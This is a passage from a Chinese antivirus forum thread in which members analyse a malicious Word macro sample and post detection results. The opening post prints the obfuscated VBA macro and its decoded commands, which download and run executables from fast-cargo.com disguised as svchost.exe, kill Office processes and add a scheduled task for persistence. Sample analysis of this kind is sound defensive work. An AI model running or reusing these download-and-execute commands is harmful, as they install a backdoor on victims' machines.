  296.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "t "
  297.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "S"
  298.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "y"
  299.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "s"
  300.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "t"
  301.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "e"
  302.     ASnWnQ2Q87WmxW291DXnw6 = "m"
  303.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "."
  304.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "N"
  305.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "e"
  306.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "t"
  307.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "."
  308.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "W"
  309.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "e"
  310.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "b"
  311.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "C"
  312.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "l"
  313.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "i"
  314.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "e"
  315.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "n"
  316.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "t"
  317.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & ")"
  318.     ASnWnQ2Q87WmxW291DXnw6 = ASnWnQ2Q87WmxW291DXnw6 & "."
  319.     ASnWnQ2Q87WmxW291DXnw7 = "D"
  320.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "o"
  321.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "w"
  322.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "n"
  323.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "l"
  324.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "o"
  325.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "a"
  326.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "d"
  327.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "F"
  328.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "i"
  329.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "l"
  330.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "e"
  331.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "("
  332.     ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "'ht"
  333. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "tp:/"
  334. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "/ww"
  335. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "w.fa"
  336. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "st-car"
  337. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "go.com/images/file"
  338. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "/vb/exe/"
  339. ASnWnQ2Q87WmxW291DXnw7 = ASnWnQ2Q87WmxW291DXnw7 & "door.exe'"
  340.     ASnWnQ2Q87WmxW291DXnw8 = ","
  341.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "'"
  342.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "%"
  343.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "P"
  344.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "u"
  345.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "b"
  346.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "l"
  347.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "i"
  348.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "c"
  349.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "%"
  350.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & ""
  351.     ASnWnQ2Q87WmxW291DXnw8 = ASnWnQ2Q87WmxW291DXnw8 & "s"
  352.     ASnWnQ2Q87WmxW291DXnw9 = "v"
  353.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "c"
  354.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "h"
  355.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "o"
  356.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "s"
  357.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "ts"
  358.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "."
  359.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "e"
  360.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "x"
  361.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "e"
  362.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "'"
  363.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & ")"
  364.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & ";"
  365.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "S"
  366.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "t"
  367.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "a"
  368.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "r"
  369.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "t"
  370.     ASnWnQ2Q87WmxW291DXnw9 = ASnWnQ2Q87WmxW291DXnw9 & "-"
  371.     ASnWnQ2Q87WmxW291DXnw010 = "P"
  372.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "r"
  373.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "o"
  374.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "c"
  375.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "e"
  376.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "s"
  377.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "s "
  378.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "'"
  379.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "%"
  380.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "P"
  381.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "u"
  382.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "b"
  383.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "l"
  384.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "i"
  385.     ASnWnQ2Q87WmxW291DXnw010 = ASnWnQ2Q87WmxW291DXnw010 & "c"
  386.     ASnWnQ2Q87WmxW291DXnw011 = "%"
  387.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & ""
  388.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "s"
  389.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "v"
  390.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "c"
  391.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "h"
  392.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "o"
  393.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "s"
  394.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "ts"
  395.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "."
  396.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "e"
  397.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "x"
  398.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "e"
  399.     ASnWnQ2Q87WmxW291DXnw011 = ASnWnQ2Q87WmxW291DXnw011 & "'"
  400.     ASnWnQ2Q87WmxW291DXnw12 = ASnWnQ2Q87WmxW291DXnw4 + ASnWnQ2Q87WmxW291DXnw5 + ASnWnQ2Q87WmxW291DXnw6 + ASnWnQ2Q87WmxW291DXnw7 + ASnWnQ2Q87WmxW291DXnw8 + ASnWnQ2Q87WmxW291DXnw9 + ASnWnQ2Q87WmxW291DXnw010 + ASnWnQ2Q87WmxW291DXnw011
  401.     shhh.Run ASnWnQ2Q87WmxW291DXnw12, vbHide
复制代码

  1. "C:\Windows\System32\cmd.exe" /K taskkill /f /im winword.exe&taskkill /f /im Excel.exe&PowerShell (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/vb/exe/38.exe','C:\Users\Public\svchost.exe');Start-Process 'C:\Users\Public\svchost.exe'
复制代码

  1. PowerShell  (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/vb/exe/38.exe','C:\Users\Public\svchost.exe');Start-Process 'C:\Users\Public\svchost.exe'
复制代码

  1. "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs
复制代码

  1. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://www.fast-cargo.com/images/file/vb/exe/door.exe','C:\Users\Public\svchosts.exe');Start-Process 'C:\Users\Public\svchosts.exe'
复制代码


衍生物:
[quote][/quote]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

petr0vic
发表于 2018-2-10 05:33:31 | 显示全部楼层
35 / 67
https://www.virustotal.com/en/fi ... 382cced7b/analysis/
回复

举报

remiliacn
 楼主| 发表于 2018-2-10 05:35:00 | 显示全部楼层
petr0vic 发表于 2018-2-10 05:33
35 / 67
https://www.virustotal.com/en/file/c946d8dd80e1efa8ae14bb84060e21b5d19055c68bafbc5512a3af03 ...

衍生物是个后门。。所以很容易啦~
回复

举报

安全守护者
头像被屏蔽
发表于 2018-2-10 08:22:15 | 显示全部楼层
remiliacn 发表于 2018-2-10 05:35
衍生物是个后门。。所以很容易啦~

衍生物都有了,主程序呢?
回复

举报

remiliacn
 楼主| 发表于 2018-2-10 08:23:10 | 显示全部楼层
安全守护者 发表于 2018-2-10 08:22
衍生物都有了,主程序呢?

怕不是没传好。。我编辑了一下
回复

举报

安全守护者
头像被屏蔽
发表于 2018-2-10 08:57:51 | 显示全部楼层
衍生物
  1. 执行:打开注册表HKEY_CURRENT_USER\Software\Borland\Locales
  2. 执行:打开注册表HKEY_LOCAL_MACHINE\Software\Borland\Locales
  3. 执行:打开注册表HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
  4. 执行:打开注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08040804
  5. 执行:打开注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\E0200804
  6. 执行:创建进程:命令行:"3.exe"
  7. 监视程序已经断开连接
复制代码
回复

举报

abcd5678
发表于 2018-2-10 09:14:54 | 显示全部楼层
现没用微点主防
要不我就尝试下
对付宏病毒及修复
俺还是比较相信微点
回复

举报

saleniy35
发表于 2018-2-10 09:17:02 | 显示全部楼层
ESET Miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Jerry.Lin
发表于 2018-2-10 10:23:24 | 显示全部楼层
  1.                 瑞星反恶软引擎命令行扫描器(社区交流版)


  4. 编译于:Sep 22 2017   15:07:50

  6. 提示:
  7.   - 本工具供社区交流使用,请勿用于其他用途
  8.   - 本工具没有恶意软件删除、清除、隔离功能
  9.   - 本工具包含开发中的新特性,结果仅供参考

  11. * 命令行中的选项开关:
  12. * 获取恶软签名库最新版本 ...
  13. * 下载恶软签名库配置文件 ...
  14. * 创建恶软签名库升级组件 ...
  15. * 计算并下载增量文件 ...
  16. * 升级恶软签名库 ...
  17. * 恶软签名库升级成功
  18. * 扫描目标 : (1) C:\Users\USER\AppData\Local\Temp\Rar$VR17656.6306

  20. * 加载恶软签名库: C:\Users\USER\Downloads\Compressed\RDM20171130x64/malware.rmd
  21. * 恶软签名库加载成功,发布序号为 3681
  22. * 读取恶软签名库配置 ...
  23. * 云辅助扫描组件初始化失败.
  24. * 初始化引擎环境 ...
  25. * 初始化引擎环境 ...
  26. * 初始化引擎环境 ...
  27. * 初始化引擎环境 ...
  28. * 初始化引擎环境 ...
  29. * 初始化引擎环境 ...
  30. * 初始化引擎环境 ...
  31. * 初始化引擎环境 ...
  32. 扫描开始: Sat Feb 10 10:23:15 2018

  34. C:\Users\USER\AppData\Local\Temp\Rar$VR17656.6306\Rar$Scan7915.bat ...  ok
  35. C:\Users\USER\AppData\Local\Temp\Rar$VR17656.6306\97M-Outbreak.7z\38.doc ...    Downloader.Generic!8.141 (CLOUD)

  37. 扫描结束: Sat Feb 10 10:23:16 2018

  39. 总扫描耗时: 0:0:300(m:s:ms)
  40. 总扫描对象: 2
  41. 总扫描文件: 2
  42. 总恶意文件: 1
  43. 有效检出率: 50.00%
复制代码
回复

举报

ATP_synthase
发表于 2018-2-10 10:28:42 | 显示全部楼层
卡巴

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 02:31 , Processed in 0.148352 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表